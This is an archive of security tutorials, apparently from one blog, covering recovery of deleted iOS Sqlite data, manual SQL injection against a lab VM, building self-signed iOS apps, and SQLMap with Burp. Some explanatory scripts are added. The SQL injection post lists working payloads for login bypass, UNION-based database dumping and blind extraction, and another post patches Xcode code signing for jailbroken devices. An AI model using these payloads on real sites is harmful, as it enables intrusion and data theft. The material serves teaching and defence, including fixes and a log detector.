Sqlite data leakage in iOS applications

24 Jan

Most iOS applications store sensitive information such as usernames, passwords and transaction details on the iPhone, either permanently or temporarily, to give the user offline access. To store large and complex data, iOS applications generally use the Sqlite database because it offers good memory usage and fast access. For example, to provide offline access the Gmail iOS application stores all emails in a Sqlite database file in plain text, and the Facebook iOS application stores all friends' details in Sqlite files.

Unencrypted sensitive information stored in a Sqlite file can be stolen easily by anyone who gains physical access to the device or to the iTunes backup. Also, when a record is deleted, Sqlite marks it as deleted but does not purge it. So if an application temporarily stores sensitive data in a Sqlite file and later removes it, the deleted data can be recovered easily by reading the Sqlite Write Ahead Log.

This article explains how to view Sqlite files and how to recover deleted data from Sqlite files on the iPhone. For this exercise, I have created a demo application called CardInfo. CardInfo is a self-signed application, so it can only be installed on a jailbroken iPhone. The CardInfo demo application accepts any username and password, then collects the user's credit card details and stores them in a Sqlite database. The database entries are deleted when the user logs out of the app.

Steps to install the CardInfo application:

1. Jailbreak the iPhone.
2. Download the CardInfoDemo.ipa file - Download link.
3. On Windows, download the iPhone configuration utility - Download link.
4. Open the iPhone configuration utility and drag the CardInfoDemo.ipa file on to it.

iPhone configuration utility

5. Connect the iPhone to the Windows machine using a USB cable. Notice that the connected device is listed in the iPhone configuration utility. Select the device and navigate to the Applications tab. It lists the already installed applications along with our CardInfo demo app.

Cardinfo demo iOS app install

6. Click on Install button corresponding to the CardInfo application.
7. It installs the CardInfo application on to the iPhone.

cardinfo ios demo app

When an application is installed on the iPhone, a directory with a unique identifier is created for it under /var/mobile/Applications. Everything the application needs in order to execute is contained in this home directory, which is known as the bundle directory.

Steps to view  CardInfo Sqlite files:

1. On the jailbroken iPhone, install OpenSSH and Sqlite3 from Cydia.
2. On the Windows workstation, download Putty.
3. Connect the iPhone and the workstation to the same Wi-Fi network.
Note: Wi-Fi is required to connect to the iPhone over SSH. If a Wi-Fi connection is not available, SSH into the iPhone over USB.
4. Run Putty and SSH into the iPhone by typing the iPhone IP address, root as the username and alpine as the password.
5. Navigate to the /var/mobile/Applications/ folder and identify the CardInfo application directory using the 'find . -name CardInfo' command. On my iPhone the CardInfo application is installed in the /var/mobile/Applications/B02A125C-B97E-4207-911B-C136B1A08687/ directory.

cardinfo directory

6. Navigate to the /var/mobile/Applications/B02A125C-B97E-4207-911B-C136B1A08687/CardInfo.app directory and notice the CARDDATABASE.sqlite3 database file.

cardinfo sqlite file

7. Sqlite database files on a jailbroken iPhone can be viewed directly using the Sqlite3 command line client. View CARDDATABASE.sqlite3 and notice that the CARDINFO table is empty.

cardinfo sqlite before login

8. On the iPhone, open CardInfo application and login (works for any username and password). 

cardinfo login

9. Enter the credit card details and click on the Save button. In the background, the app saves the card details in the Sqlite database.

cardinfo - card details                    cardinfo - saved details

10. View CARDDATABASE.sqlite3 and notice that the CARDINFO table now contains the credit card details.

cardinfo sqlite after save

11. Log out of the application on the iPhone. In the background, it deletes the data from the Sqlite database.

cardinfo logout

12. Now view CARDDATABASE.sqlite3 and notice that the CARDINFO table is empty again.

cardinfo sqlite after logout

Steps to recover the deleted data from CardInfo Sqlite file:

The Sqlite database engine writes data into a Write Ahead Log (WAL) before storing it in the actual database file, so that it can recover from system failures. At every checkpoint or commit, the data in the WAL is written into the database file. So if an entry is deleted from the Sqlite database and there is no immediate commit, the deleted data can easily be recovered by reading the WAL. On iOS, the strings command can be used to print the deleted data from a Sqlite file. In our case, running 'strings CARDDATABASE.sqlite3' prints the deleted card details.

cardinfo sqlite recovered

In iOS, if an application uses the Sqlite database for temporary storage, there is always a possibility to recover the deleted temporary data from the database file.

For better security, use custom encryption when storing sensitive data in the Sqlite database. Also, before deleting a Sqlite record, overwrite that entry with junk data, so that even if someone recovers the deleted record from Sqlite they will not get the actual data.
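As an added illustration (not part of the original post), the following Python script reproduces the leak with the standard sqlite3 module and then shows the effect of Sqlite's own countermeasure, PRAGMA secure_delete, which overwrites deleted content with zeros, and of VACUUM, which rebuilds the file from live rows only. The CARDINFO table layout and the card number are constructed for the example; only the table and file names come from the article.

```python
import os
import sqlite3
import tempfile

# Constructed sample value standing in for a real card number.
CARD_NUMBER = "4111222233334444"


def leaked_after_delete(secure_delete, vacuum=False):
    """Create a CARDINFO table like the demo app's, insert and delete one card,
    then report whether the card number is still present in the raw file bytes."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "CARDDATABASE.sqlite3")
        conn = sqlite3.connect(path)
        # Rollback-journal mode keeps every committed page in the main file, so
        # inspecting that one file is enough here (the journal is removed on commit).
        conn.execute("PRAGMA journal_mode = DELETE")
        # Set explicitly so the outcome does not depend on the library's compiled-in default.
        conn.execute("PRAGMA secure_delete = " + ("ON" if secure_delete else "OFF"))
        conn.execute("CREATE TABLE CARDINFO (id INTEGER PRIMARY KEY, name TEXT, number TEXT)")
        conn.execute("INSERT INTO CARDINFO (name, number) VALUES (?, ?)", ("demo user", CARD_NUMBER))
        conn.commit()
        # What the demo app does on logout: the row is deleted and the change committed.
        conn.execute("DELETE FROM CARDINFO WHERE id = 1")
        conn.commit()
        if vacuum:
            conn.execute("VACUUM")  # rebuilds the file; freed space is not copied over
        conn.close()
        # Same check as running `strings` on the file: look for the value in the raw bytes.
        with open(path, "rb") as f:
            raw = f.read()
    return CARD_NUMBER.encode() in raw


if __name__ == "__main__":
    for label, args in [("default settings", {}),
                        ("secure_delete=ON", {"secure_delete": True}),
                        ("VACUUM after delete", {"secure_delete": False, "vacuum": True})]:
        args.setdefault("secure_delete", False)
        print(f"{label:22s} card number recoverable: {leaked_after_delete(**args)}")
```

With the default settings the deleted row is still readable from the file, which is exactly what the strings command showed above; with secure_delete turned on for the connection, or after a VACUUM, it is gone. The pragma costs some extra I/O on every delete, which is the trade-off for not having to remember to overwrite each record by hand.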

 
 

SQL Injection exploitation and dumping the database

07 Jan

SQL Injection:

SQL Injection is a web-based attack used by attackers to steal sensitive information from organizations through their web applications. It has been one of the most common application layer attacks for a long time. The attack takes advantage of improper coding in web applications, which allows an attacker to exploit the vulnerability by injecting SQL commands through the web application. The underlying fact that makes SQL Injection possible is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, consider a web application that implements a form-based login mechanism, stores the user credentials in a database and performs a simple SQL query to validate each login attempt. Here is a typical example:

select * from users where username='admin' and password='admin123';


If the attacker knows that the username of the application administrator is admin, then he can log into the app as admin by entering the username as admin'-- without supplying any password. The query in the back-end looks like:

select * from users where username='admin'--' and password='xxx';


The comment sequence (--) causes the rest of the query to be ignored, so the query executed is equivalent to:

select * from users where username='admin';


Hence the password check is bypassed and the attacker is logged into the app as admin.
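As an added example that is not part of the original article, the Python snippet below reproduces the bypass against an in-memory SQLite table and sets it beside the parameterized form of the same query, which is the fix: a bound value is passed to the engine as data and never parsed as SQL, so admin'-- is looked up literally as a username and the login fails. The users table and its single admin row are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the article's users table (one admin row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin123')")
    conn.commit()
    return conn


def build_query_vulnerable(username, password):
    """The article's pattern: user input is pasted straight into the SQL text."""
    return "select * from users where username='%s' and password='%s'" % (username, password)


def login_vulnerable(conn, username, password):
    """A quote followed by -- ends the string literal and comments out the password check."""
    return conn.execute(build_query_vulnerable(username, password)).fetchone() is not None


def login_safe(conn, username, password):
    """The fix: bound parameters. The SQL text is fixed; the values travel separately."""
    sql = "select * from users where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("admin", "admin123"), ("admin'--", "xxx")]:
        print(build_query_vulnerable(user, pw))
        print("  vulnerable login:", login_vulnerable(db, user, pw),
              "| parameterized login:", login_safe(db, user, pw))
```

Running it prints the exact query text the vulnerable version sends, which is also the string a reviewer should expect to find in the application's query log when this bypass is attempted.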

Different types of SQL Injections:

SQL Injection can be classified into three types based on the way it is exploited: In-band, Out-band and Inferred.

1. In-band:

This is also called Error-based or Union-based SQL Injection, or first-order injection. The application is said to be vulnerable to In-band injection when the communication between the attacker and the application happens through a single channel, i.e. the attacker uses the same channel to enter the malicious string and to retrieve the data from the database. This is a straightforward technique: the application directly displays the retrieved data on the web pages.

Confirming the Vulnerability:

The URL below belongs to an In-band SQLi vulnerable practice site which I set up in my VM.

http://192.168.1.2/news-and-events.php?id=22


Accessing the URL displays the home page as shown in the image below.

Sqlinjection demo

Now let us try to confirm the vulnerability by simply adding a single quote at the end of the URL:

http://192.168.1.2/news-and-events.php?id=22'


The above URL shows an error on the web page saying "Error in your SQL syntax". This is because the extra single quote (') that we entered through the URL was appended to the query in the background. By seeing the error we can understand that the URL is vulnerable to In-band SQLi. The image below shows the error that occurred due to concatenating the special character (').

Sqlinjection error

If the single quote (') is blocked, then we can try appending "or 1=1 --" or "and 1=1 --" to the URL.

http://192.168.1.2/news-and-events.php?id=22 or 1=1 -- (or)
http://192.168.1.2/news-and-events.php?id=22 and 1=1 --


The above URLs show the same page that was displayed while accessing the URL:

http://192.168.1.2/news-and-events.php?id=22


This is because the condition that we have entered at the end of the URL is always true.

Now try to access the page with the string "or 1=0--" or "and 1=0--". The URL looks like:

http://192.168.1.2/news-and-events.php?id=22 or 1=0-- (or)
http://192.168.1.2/news-and-events.php?id=22 and 1=0--


Now we will not be able to access the page, because the condition "1=0" is always false. The image below shows the page when accessed with the false condition.

Sqlinjection confirmation

This confirms that the URL is vulnerable to SQLi.

The strings listed in the table below can be used to confirm SQL Injection:

or 1=1          'or 1=1          "or 1=1
or 1=1--        'or 1=1--        "or 1=1--
or 1=1#         'or 1=1#         "or 1=1#
or 1=1/*        'or 1=1/*        "or 1=1/*
or 1=1;%00      'or 1=1;%00      "or 1=1;%00
'or'            "or              'or'--
'or--           or a=a           'or a=a
"or a=a         or a=a--         'or a=a --
"or a=a--       or 'a'='a'       'or 'a'='a'
"or 'a'='a'     ')or('a'='a'     ")"a"="a"
')'a'='a        'or''='

You can try all the combinations for the string "or a=a" that we tried for "or 1=1", i.e. with #, --, /* etc.

Extracting Information:

Moving further, we can extract or dump the complete database by using the UNION and SELECT commands.

Finding the DBMS:

We can find out the DBMS type (MS-SQL, MySQL, Oracle) by using functions unique to each database. For example, each of the above databases has a different syntax for finding the database user.

MS-SQL: user_name()
MySQL: user()
Oracle: select user from dual;

So let's try to find the DBMS of our SQLi vulnerable site. As a first attempt I am entering "user_name()" in the place where we had "2".

http://192.168.1.2/news-and-events.php?id=-22 union select 1,user_name(),3,4,5,6,7


The above URL gives an error saying "Function user_name doesn't exist", which means the DBMS isn't MS-SQL.

Find database in Sql injection

The above image shows that the DBMS isn't MS-SQL. Now let's try with "user()".

http://192.168.1.2/news-and-events.php?id=-22 union select 1,user(),3,4,5,6,7


The above URL displays the user name of the DBMS, so we can confirm that the DBMS is MySQL.

Sqli - fetch database username

The above image shows the database user name, which proves that the DBMS is MySQL.

So we can use any MySQL function in the place of 2, 3, 5 or 7 and dump the database onto the web page.

Finding the number of columns:

Let us try to find out the number of columns in the table using UNION. The URL looks like:

http://192.168.1.2/news-and-events.php?id=22 union select NULL


This displays an error on the page saying "Select statement having different number of columns". Now we understand that there is more than one column in the table.

finding number of columns using sql injection

The image shows the error message that occurred when accessing the web site using the above URL (using select NULL). So try adding one more NULL.

http://192.168.1.2/news-and-events.php?id=22 union select NULL, NULL


If we still receive the same error, keep adding NULLs to the query until we find the number of columns in the table.

http://192.168.1.2/news-and-events.php?id=22 union select NULL, NULL, NULL, NULL, NULL, NULL, NULL


The above string gives the same page as the initial URL, because the number of columns in the table is seven.

finding columns usingsl injection by using order by

The figure shows the page when accessed with the above URL (using seven NULLs).

We can also use ORDER BY to find out the number of columns in the table.

http://192.168.1.2/news-and-events.php?id=22 order by 7--


So we can understand that there are seven columns in the table.

Now here is the trick: where will we be able to see the data extracted from the database?

Just add a negative sign before the id value; then the data appears on the web page straight away.

http://192.168.1.2/news-and-events.php?id=-22 union select 1,2,3,4,5,6,7


(Note: Negative sign (-) before 22)

Then the application displays some of the numbers on the web page. The above URL displays 2, 3, 5 and 7 on the web page.

display content on web page using sql injection

Figure shows the numbers displayed on the web page.

Finding the version and getting the databases:
http://192.168.1.2/news-and-events.php?id=-22 union select 1,@@version,database(),4,5,6,7


finding version of database using sql injection

The figure displays the database version "5.0" and the database "nilakantatrust".

Extracting Tables from database:

Now let us try extracting all the tables from the database “nilakantatrust”.

http://192.168.1.2/news-and-events.php?id=-22 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--

extract tables using sql injection

Figure shows all the tables dumped from the database “nilakantatrust”.

information_schema is the built-in schema whose tables contain metadata, i.e. information about all the tables and columns of the database.

Extracting columns from the tables:
http://192.168.1.2/news-and-events.php?id=-22 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--

extracting columns using sql injection
The figure displays all the columns of the tables in the database "nilakantatrust". We can look at all the columns and then dump the interesting ones like passwords, SSNs, credit card numbers etc.

2. Out-Band:


This kind of attack uses two different channels for communication between the attacker and the application. Modern DBMSs are very powerful applications, and their features go beyond simply returning data to users: they can be instructed to send e-mail and they can also interact with the file system. All of this functionality is very helpful to an attacker. The attacker establishes a direct connection to the database through one channel to insert the data or the malicious string into the database, and the DBMS responds through a new channel, such as e-mail, or by executing commands using xp_cmdshell etc.

3. Inferred:


This is also known as Blind SQL Injection. Here the server doesn't respond with any syntax error or other notification. This is very similar to normal SQL Injection, but the attacked server doesn't send any data back to the attacker; the attacker needs to retrieve the data by asking true or false questions through SQL commands.

The attacker has to execute his commands by observing the response of the application. This makes exploiting a SQL Injection vulnerability more difficult, but not impossible.

Now let’s have some practice:

http://192.168.1.2/news-and-events.php?id=22  and 1=1 --


The above URL gives the same data as the original site.

http://192.168.1.2/news-and-events.php?id=22  and 1=0 --


The above URL shows an error on the web page, as I explained previously (in the In-band type).

Finding the DBMS:

To find out the DBMS used by the application we need to make use of the different pre-defined functions available in different databases.

For example, to find out the user name of the database the following syntax is used by the different DBMSs:

  • MS-SQL: user_name()
  • MySQL: user()
  • Oracle: select user from dual


You can see the differences in the cheat-sheet available at www.pentestmonkey.net

So, let us find out the DBMS using the above functions ;)

Accessing the URL below gives you a white page.

http://192.168.1.2/news-and-events.php?id=21

blind sql injection

Observe the white page in the figure, which is different from the URL:

http://192.168.1.2/news-and-events.php?id=22

which we have seen previously. By observing this difference we can extract the DBMS type of the application.

Let us check whether the application is using MS-SQL:

http://192.168.1.2/news-and-events.php?id=21%2b(select%20case%20when%20(select%20user_name())%20then%200%20else%201%20end%20)--

In the above URL I am trying to add 1 to the id '21' based on the condition. When we access the URL with ID=21 we get the page shown in Figure (m), and when we access the URL with ID=22 we get the home page shown in Figure (a).

In the URL, %2b stands for '+' and %20 stands for ' ' (space). This is called URL encoding. When a particular symbol is filtered, we can pass it by encoding it using one of the different encoding techniques available.

The condition in the query is framed using a "case" statement together with "user_name" (a pre-defined function in MS-SQL that returns the DB user name). If the function user_name() is found, the condition returns '1', which makes the ID=22; otherwise it returns '0' and the id remains '21'.

finding database using blind sql injection

The figure shows the page which confirms that the DBMS isn't MS-SQL. So, now let us check for MySQL:

http://192.168.1.2/news-and-events.php?id=21%2b(select%20case%20when%20(select%20user())%20then%200%20else%201%20end)--

The above URL shows the page with ID=22, which confirms that the DBMS is MySQL.

Finding the version:

To find the database version we can use the 'substr' function in MySQL. Observe the URL below:

http://192.168.1.2/news-and-events.php?id=22%20and%20substr(@@version,1,1)=5--

If the database version starts with '5', the substr function returns '5' (we extract only one character) and the comparison with '5' holds. So if we are able to see the home page, we can confirm that the database is a 5.x.x version.

If the URL doesn't bring up the home page, then we can try changing the comparison value to 4, 3 etc.

To find the exact version of the database we need to compare the second character of the version, and so on. For example:

substr(@@version,2,1)=0
substr(@@version,3,1)=1

So, by observing the responses of the application we can extract complete version of the database.

Finding the User Name of the database:

We can find out the user name of the database by using both the 'case' statement and the 'substr' function.

http://192.168.1.2/news-and-events.php?id=22%2b%20(select%20case%20when%20(substr(user(),1,1)='a')%20then%200%20else%201%20end)--

Based on the responses of the application, keep changing the character in the substr() comparison. Once we get the first letter of the user name, move on to find the second letter.

For example:

substr(user(),2,1)=’r’
substr(user(),3,1)=’b’ ….

In this fashion, to find out a single character of the user name we have to send more than 200 requests to the server, one for each possible ASCII character. This technique can be optimized so that a single character is extracted from the database within 8 requests.
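From the defender's side, every probe shown in the In-band and Inferred sections above leaves a distinctive trace in the web server's access log. The Python script below is an added example rather than part of the article: it URL-decodes the query string of each request (the %2b and %20 encoding discussed above included) and tags it with the signatures it matches: boolean probes (or 1=1, and 1=0), UNION SELECT, information_schema enumeration, version and user fingerprinting, the CASE WHEN / substr() pattern of blind extraction, a trailing comment sequence, and the unbalanced single quote of the first syntax probe. It also counts flagged requests per client, since blind extraction shows up as a long run of near-identical requests from one source. The log lines are constructed in Apache combined-log format; the paths and payloads mirror the ones on this page.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache combined-log style line: client, timestamp, request line, status, size.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Signatures applied to the URL-decoded query string; each mirrors a probe shown
# in the article. Order matters only for the order of tags in the output.
SQLI_SIGNATURES = [
    ("boolean_probe", re.compile(r"\b(?:or|and)\s+'?\w+'?\s*=\s*'?\w+'?", re.I)),
    ("union_select",  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum",   re.compile(r"\binformation_schema\.", re.I)),
    ("fingerprint",   re.compile(r"@@version|\b(?:user_name|user|database)\(\)", re.I)),
    ("blind_probe",   re.compile(r"\bcase\s+when\b|\bsubstr(?:ing)?\s*\(", re.I)),
    ("comment_tail",  re.compile(r"(?:--|#|/\*)\s*$")),
]


def decode_query(target):
    """URL-decode the query string of a request target ('' when there is none)."""
    return unquote_plus(urlsplit(target).query)


def classify(target):
    """Return the list of signature tags that the request target matches."""
    query = decode_query(target)
    tags = [tag for tag, rx in SQLI_SIGNATURES if rx.search(query)]
    # An odd number of single quotes is the trace of the classic id=22' syntax probe.
    if query.count("'") % 2 == 1:
        tags.append("unbalanced_quote")
    return tags


def scan_log(lines):
    """Return (ip, target, status, tags) for every parsable line that triggers a tag."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        tags = classify(m["target"])
        if tags:
            hits.append((m["ip"], m["target"], int(m["status"]), tags))
    return hits


def hits_per_source(hits):
    """Count flagged requests per client address; a burst from one source is the blind-SQLi tell."""
    counts = {}
    for ip, _target, _status, _tags in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


# Constructed sample log (not real traffic); the payloads follow the article's examples.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Jan/2013:10:00:01 +0000] "GET /news-and-events.php?id=22 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [07/Jan/2013:10:00:02 +0000] "GET /news-and-events.php?id=22%27 HTTP/1.1" 500 812',
    '10.0.0.5 - - [07/Jan/2013:10:00:03 +0000] "GET /news-and-events.php?id=22%20or%201=1%20-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [07/Jan/2013:10:00:04 +0000] "GET /news-and-events.php?id=-22%20union%20select%201,@@version,database(),4,5,6,7 HTTP/1.1" 200 3301',
    '10.0.0.9 - - [07/Jan/2013:10:00:05 +0000] "GET /news-and-events.php?id=21%2b(select%20case%20when%20(select%20user())%20then%200%20else%201%20end)-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [07/Jan/2013:10:00:06 +0000] "GET /news-and-events.php?id=22%20and%20substr(@@version,1,1)=5-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [07/Jan/2013:10:00:07 +0000] "GET /about.php HTTP/1.1" 200 2200',
]

if __name__ == "__main__":
    flagged = scan_log(SAMPLE_LOG)
    for ip, target, status, tags in flagged:
        print(f"{ip} {status} {target}\n    -> {', '.join(tags)}")
    print("flagged requests per source:", hits_per_source(flagged))
```

The signatures are deliberately narrow so that the script can be read as a specification of what each probe on this page looks like after decoding; in production the same tags would feed a WAF rule set or a SIEM correlation on the per-source count, and the 500 status on the quote probe is the error-page response the article describes.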

Conclusion:

SQL Injection is a powerful attack technique which can be used to dump complete database of the application.

I have written this article for InfoSec Institute. Take a look at the web application security course offered by InfoSec Institute.

 

 

Posted by kamalb

 

Build ipa file using XCode without provisioning profile

26 Dec

To develop an application for iOS devices one must first obtain a provisioning profile by joining the iPhone Developer Program (which costs $99). However, a few simple tricks can be used to build self-signed applications with Xcode that can be installed on jailbroken devices. The steps below explain the detailed procedure to build ipa files without a developer certificate for jailbroken devices. This was tested on Mountain Lion 10.8, Xcode 4.5 and the iOS 6 SDK.

Steps to build ipa file using Xcode:
1. Create a self signed code signing certificate.

On Mac OS X, go to Keychain Access -> Certificate Assistant -> Create a Certificate. This opens the certificate assistant window. Enter a name (in my case securitylearn.net) and select the certificate type as Code Signing. Check the 'Let me override defaults' option. Hit Continue until it creates the certificate.

OS X self signed certificate

After creation of the certificate, the keychain looks as shown in the image below.

Certificate in keychain1

2. Copy /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Info.plist to the desktop. Edit the plist file and replace all occurrences of XCiPhoneOSCodeSignContext with XCCodeSignContext (3 places: defaultproperties, runtimerequirements, overrideproperties).

Before modification:

xcode info plist before modification

After modification:

xcode info plist after modification

3. Copy the modified Info.plist file back to the /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/ directory, replacing the existing file.
4. Close and restart Xcode.
5. Create your project in Xcode and, in the project target settings, choose the certificate created in step 1 as the code signing identity. The project target settings are shown below.

xcode project code signing settings

6. Build the project for iOS device (Project->Build).
7. The build creates the .app file in the build/Debug-iphoneos folder.

Xcode build app

The default location for the .app file is:
/Users/[user name]/Library/Developer/Xcode/DerivedData/[your app]/Build/Products/Debug-iphoneos/

xcode build directory

8. Create a folder named Payload and copy the .app file into it.

Payload folder

9. Archive the Payload folder. This creates Payload.zip.
10. Rename Payload.zip to [app name].ipa. We have successfully created the ipa file without a developer certificate, and it can be installed on a jailbroken device using the iPhone configuration utility.
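Step 2 can be automated and checked rather than done by hand in a text editor. The Python script below is an added example, not part of the original post: it parses the plist with the standard plistlib module, replaces every string value equal to XCiPhoneOSCodeSignContext with XCCodeSignContext, and refuses to write anything unless exactly the three occurrences the post mentions were found, so a changed plist layout in a newer Xcode is caught instead of silently half-patched. The sample plist embedded at the bottom is a constructed stand-in for the real platform Info.plist, and the key name CODE_SIGN_CONTEXT_CLASS under each of the three dictionaries is an assumption.

```python
import plistlib
import shutil
import sys

OLD_CLASS = "XCiPhoneOSCodeSignContext"
NEW_CLASS = "XCCodeSignContext"
EXPECTED_OCCURRENCES = 3  # defaultproperties, runtimerequirements, overrideproperties


def replace_values(node, old, new):
    """Recursively replace string values equal to `old` in nested dicts/lists.
    Returns the number of replacements made."""
    count = 0
    if isinstance(node, dict):
        items = list(node.items())
    elif isinstance(node, list):
        items = list(enumerate(node))
    else:
        return 0
    for key, value in items:
        if isinstance(value, str):
            if value == old:
                node[key] = new
                count += 1
        else:
            count += replace_values(value, old, new)
    return count


def rewrite_codesign_context(plist_bytes, expected=EXPECTED_OCCURRENCES):
    """Return (patched plist bytes, replacement count).
    Raises ValueError when the number of occurrences is not the expected one."""
    data = plistlib.loads(plist_bytes)
    count = replace_values(data, OLD_CLASS, NEW_CLASS)
    if count != expected:
        raise ValueError(f"expected {expected} occurrences of {OLD_CLASS}, found {count}")
    return plistlib.dumps(data), count


def patch_file(path):
    """Patch the Info.plist at `path` in place, keeping a .bak copy of the original."""
    with open(path, "rb") as f:
        original = f.read()
    patched, count = rewrite_codesign_context(original)
    shutil.copyfile(path, path + ".bak")
    with open(path, "wb") as f:
        f.write(patched)
    return count


# Constructed stand-in for the platform Info.plist; the key name is an assumption.
SAMPLE_PLIST = plistlib.dumps({
    "DefaultProperties": {"CODE_SIGN_CONTEXT_CLASS": OLD_CLASS},
    "RuntimeRequirements": {"CODE_SIGN_CONTEXT_CLASS": OLD_CLASS},
    "OverrideProperties": {"CODE_SIGN_CONTEXT_CLASS": OLD_CLASS},
})

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        print(f"{target}: replaced {patch_file(target)} occurrence(s), backup at {target}.bak")
    else:
        _patched, n = rewrite_codesign_context(SAMPLE_PLIST)
        print(f"sample plist: replaced {n} occurrence(s)")
```

Run it with the path of the copied Info.plist as its only argument; without an argument it exercises the embedded sample. Because the check is on the count, running it a second time over an already patched file fails loudly instead of producing a confusing no-op.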

This comes in handy for pentesters as well, when they want to create vulnerable demo apps.

Update on 16-Feb-2013: To install a self-signed ipa on iOS 6 devices (thanks to Leo for sharing this info):
1. Go to Cydia->Manage and add http://gdeluxe.com/repo as a source.

appsync cydia

2. Download and install AppSync for iOS 6.x from Cydia.
3. Now you can install the ipa file using the iPhone configuration utility.

 
 

Exploit SQL Injection through SQLMap Burp Plugin

17 Dec

SQL Injection:

SQL Injection (SQLi) is a web-based attack used by hackers to steal sensitive information from organizations through their web applications. It is one of the most common application layer attacks used today. The attack takes advantage of improper coding in web applications, which allows hackers to exploit the vulnerability by injecting SQL commands through the web application. The underlying fact that makes SQLi possible is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, consider a web application that implements a form-based login mechanism, stores the user credentials in a database and performs a simple SQL query to validate each login attempt. Here is a typical example:

select * from users where username='admin' and password='admin123';

If the attacker knows that the username of the application administrator is admin, then he can log into the app as admin by entering the username as admin'-- without supplying any password. The query in the back-end looks like:

select * from users where username='admin'--' and password='xxx';

The comment sequence (--) causes the rest of the query to be ignored, so the query executed is equivalent to:

select * from users where username='admin';

Hence the password check is bypassed and the attacker is logged into the app as admin. SQL Injection can be tested in two ways: manual pen-testing and automation.

1) Manual Pen-Testing: This is the process of detecting and exploiting the vulnerability by hand, passing the malicious strings ourselves. I'll give a clear explanation of exploiting SQLi manually in my next post.

2) Automated: This is done by running tools. There are many tools to find and exploit SQLi vulnerabilities; some of them are SQLMAP, ABSINTHE, SQL NINJA, The Mole, etc. I would love to use a tool which can be attached to the proxy that I use regularly in my work, so I chose the SQLMap plugin for Burp.

SQLMAP:

SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers. SQLMAP comes with a powerful detection engine, many niche features for the penetration tester and a wide range of switches, ranging from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Since SQLMAP is developed in Python it is portable, meaning that it works on any operating system that supports Python.

SQLMAP burp plug-in:

When we audit a web application, we normally configure an intercepting proxy to have more control over the request and response parameters. The SQLMAP plug-in is an add-on that we can configure in Burp, through which we can redirect a URL or a request directly to SQLMAP with a single mouse click.

Plug-in Setup:

1. Download the plugin zip file from the following URL: http://code.google.com/p/gason/downloads/list
2. Unzip the file and keep it in the same folder where burp proxy is located.
3. Then execute the following command to run Burp with the plug-in.

Linux:

java -classpath burpplugins.jar:"burpsuite_v1.4.0.1.jar" burp.StartBurp

Windows:

java -classpath burpsuite_v1.4.0.1.jar;burpplugins.jar burp.StartBurp

*Replace the burpsuite jar with the version that you are using; in my case it is burpsuite_v1.4.0.1.jar. We also need to download the SQLMAP tool, as we need to supply its executable to the Burp plug-in.

Setting up SQLMAP:

For Windows,
1. Download and install Python 2.7 - http://www.python.org/getit/
2. Download sqlmap - https://github.com/sqlmapproject/sqlmap
3. Unzip the name.zip file to sqlmap directory.

For Ubuntu or Linux, run the commands below from the terminal:

> sudo apt-get install python-tk python2.7
> git clone git://github.com/sqlmapproject/sqlmap.git
> cd sqlmap
> wget http://gui-for-sqlmap.googlecode.com/files/sqm-60712.zip
> unzip sqm-60712.zip

Setting up the environment:

- If you are using the OWASP Broken Web Applications VM, then simply access one of its vulnerable sites from the local browser on the machine where you are running SQLMAP.
- If you don't use OWASP Broken Web Applications, then you need to set up a virtual machine with a web server to host the vulnerable web application.
- Configure another VM with Ubuntu where the attacker runs SQLMAP.

Configuring the Proxy:

- If you are using Mozilla Firefox, go to Edit > Preferences > Advanced > Network > Settings and select "Manual proxy configuration". Enter localhost as the HTTP proxy and the port on which the proxy is running.
- If you are using Chrome, go to Settings > Show advanced settings > Network > Change proxy settings > Connections > LAN settings.

How to use the plug-in:

Once you have loaded the plug-in it is very easy to use. Run the Burp proxy with the plug-in loaded. In the "Site map" tab under "Target" you can see the domain that you are testing for SQLi and all the crawled pages related to it. On the right side click on the URL that you want to test; you can see the request parameters of the URL in the bottom panel. Right-click on the request and you will see the option "Send to sqlmap", as shown in the figure below.

Forward URL To Sqlmap burp plugin

Then a new window (the SQLMap wrapper) opens that allows you to configure sqlmap. The image below gives a clear view of the wrapper.

sqlmap plugin window

Now let's have an overview of the configuration features of the wrapper. In the "Target" text box specify the URL that you want to test (normally it is filled in by default, as you sent the request previously; if needed you can change the URL).

Specify the method by which the page is accessed (GET/POST). In "Bin-path" give the path to the sqlmap executable.

If you know the DBMS of the web application, specify it by selecting one of the options in the dropdown list. By default "auto" is selected, which means the SQLMAP wrapper tries all the databases listed in the dropdown to find out which one the application uses.

You can enumerate the database users, passwords, roles, privileges, databases etc. by selecting the appropriate option from the Action drop-down list. By default it is set to "auto", which means it will try all the options listed in the drop-down in sequential order.

If you already know the databases, users, tables or columns, you can enumerate them by specifying them in the Database options.

Tamper scripts modify the injected query, for example by inserting special characters or symbols, while pen-testing the application.

